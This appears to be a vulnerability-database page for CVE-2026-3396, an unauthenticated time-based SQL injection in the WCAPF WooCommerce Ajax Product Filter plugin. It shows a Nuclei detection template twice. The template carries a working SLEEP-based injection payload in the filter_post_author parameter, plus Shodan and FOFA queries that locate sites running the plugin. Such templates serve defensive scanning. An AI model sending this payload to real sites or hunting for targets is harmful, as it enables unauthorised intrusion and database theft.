WCAPF WooCommerce Ajax Product Filter - SQL Injection

CVE-2026-3396

Verified

Description

WCAPF WooCommerce Ajax Product Filter <= 4.2.3 contains a time-based SQL injection caused by insufficient escaping of the 'post-author' parameter, letting unauthenticated attackers extract sensitive database information remotely.

Severity

High

CVSS Score

7.5

Exploit Probability

23%

Published Date

April 14, 2026

Template Author

theamanrawat

CVE-2026-3396.yaml

id: CVE-2026-3396

info:
  name: WCAPF WooCommerce Ajax Product Filter - SQL Injection
  author: theamanrawat
  severity: high
  description: |
    WCAPF WooCommerce Ajax Product Filter <= 4.2.3 contains a time-based SQL injection caused by insufficient escaping of the 'post-author' parameter, letting unauthenticated attackers extract sensitive database information remotely.
  impact: |
    Unauthenticated attackers can extract sensitive database information, potentially compromising data confidentiality.
  remediation: |
    Update to a version later than 4.2.3 or the latest available version.
  reference:
    - https://patchstack.com/database/vulnerability/wordpress-wcapf-woocommerce-ajax-product-filter-plugin-4-2-3-unauthenticated-time-based-sql-injection-vulnerability
    - https://nvd.nist.gov/vuln/detail/CVE-2026-3396
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2026-3396
    epss-score: 0.22856
    epss-percentile: 0.95968
    cwe-id: CWE-89
  metadata:
    verified: true
    max-request: 2
    shodan-query: 'http.html:"/wp-content/plugins/wc-ajax-product-filter/"'
    fofa-query: 'body="/wp-content/plugins/wc-ajax-product-filter/"'
  tags: sqli,wp-plugin,wc-ajax-product-filter,woocommerce,wordpress

flow: http(1) && http(2)

http:
  - method: GET
    path:
      - "{{BaseURL}}/wp-content/plugins/wc-ajax-product-filter/readme.txt"

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
        internal: true

      - type: word
        words:
          - "WCAPF"
          - "WooCommerce Ajax Product Filter"
        condition: and
        internal: true

  - method: GET
    path:
      - "{{BaseURL}}/shop/?filter_post_author=1%27%20AND%20SLEEP(6)%20AND%20%271%27%3D%271"

    matchers:
      - type: dsl
        dsl:
          - 'duration>=6'
          - 'contains(body, "No results found")'
          - 'status_code == 200'
        condition: and
# digest: 490a004630440220348bb98c28b254d5d371ae8b2d6eb29c69913058cac832fecf84db5c88e4846c0220275ab2124a8ca00fde9e9ee08fab9ce6c755b249527728202e18a67384563738:922c64590222798bb761d5b6d8e72950

7.5Score

CVSS Metrics

CVSS Vector:

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

CVE ID:

cve-2026-3396

CWE ID:

cwe-89

References

https://patchstack.com/database/vulnerability/wordpress-wcapf-woocommerce-ajax-product-filter-plugin-4-2-3-unauthenticated-time-based-sql-injection-vulnerability https://nvd.nist.gov/vuln/detail/CVE-2026-3396

Remediation Steps

Update to a version later than 4.2.3 or the latest available version.

id: CVE-2026-3396

info:
  name: WCAPF WooCommerce Ajax Product Filter - SQL Injection
  author: theamanrawat
  severity: high
  description: |
    WCAPF WooCommerce Ajax Product Filter <= 4.2.3 contains a time-based SQL injection caused by insufficient escaping of the 'post-author' parameter, letting unauthenticated attackers extract sensitive database information remotely.
  impact: |
    Unauthenticated attackers can extract sensitive database information, potentially compromising data confidentiality.
  remediation: |
    Update to a version later than 4.2.3 or the latest available version.
  reference:
    - https://patchstack.com/database/vulnerability/wordpress-wcapf-woocommerce-ajax-product-filter-plugin-4-2-3-unauthenticated-time-based-sql-injection-vulnerability
    - https://nvd.nist.gov/vuln/detail/CVE-2026-3396
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2026-3396
    epss-score: 0.22856
    epss-percentile: 0.95968
    cwe-id: CWE-89
  metadata:
    verified: true
    max-request: 2
    shodan-query: 'http.html:"/wp-content/plugins/wc-ajax-product-filter/"'
    fofa-query: 'body="/wp-content/plugins/wc-ajax-product-filter/"'
  tags: sqli,wp-plugin,wc-ajax-product-filter,woocommerce,wordpress

flow: http(1) && http(2)

http:
  - method: GET
    path:
      - "{{BaseURL}}/wp-content/plugins/wc-ajax-product-filter/readme.txt"

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
        internal: true

      - type: word
        words:
          - "WCAPF"
          - "WooCommerce Ajax Product Filter"
        condition: and
        internal: true

  - method: GET
    path:
      - "{{BaseURL}}/shop/?filter_post_author=1%27%20AND%20SLEEP(6)%20AND%20%271%27%3D%271"

    matchers:
      - type: dsl
        dsl:
          - 'duration>=6'
          - 'contains(body, "No results found")'
          - 'status_code == 200'
        condition: and
# digest: 490a004630440220348bb98c28b254d5d371ae8b2d6eb29c69913058cac832fecf84db5c88e4846c0220275ab2124a8ca00fde9e9ee08fab9ce6c755b249527728202e18a67384563738:922c64590222798bb761d5b6d8e72950

WCAPF WooCommerce Ajax Product Filter - SQL Injection

Description

Severity

CVSS Score

Exploit Probability

Published Date

Template Author

Nuclei Template

CVSS Metrics

References

Remediation Steps

WCAPF WooCommerce Ajax Product Filter - SQL Injection

Description

Severity

CVSS Score

Exploit Probability

Published Date

Template Author

Nuclei Template

CVSS Metrics

References

Remediation Steps